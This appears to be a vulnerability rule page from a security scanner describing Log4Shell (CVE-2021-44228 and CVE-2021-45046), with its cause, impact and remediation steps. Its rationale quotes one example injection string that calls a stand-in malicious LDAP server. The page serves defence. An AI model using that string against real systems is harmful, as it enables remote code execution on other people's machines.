Log4Shell
ID |
log4shell |
Severity |
critical |
Kind |
Remote Code Execution |
CWE |
117 |
Description
-
Log4Shell (CVE-2021-44228): JNDI features in Apache Log4j2 at or before 2.14.1 and used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.
-
Log4Shell (CVE-2021-45046): It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments.
Rationale
Log4Shell enables remote code execution by exploiting JNDI lookup functionality in vulnerable Log4j versions. Attackers inject specially crafted strings like ${jndi:ldap://malicious-server/exploit} into any logged data (HTTP headers, form fields, user-agent strings).
When Log4j processes these strings, it performs a JNDI lookup that contacts the attacker’s server and loads malicious Java code, granting the attacker complete control over the vulnerable system. This critical vulnerability affects countless internet-facing applications and has been actively exploited in the wild.
Remediation
Upgrade Log4j2 to version 2.17.1 or newer. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to "true" or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
Java 8u121 (see Release Notes) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false.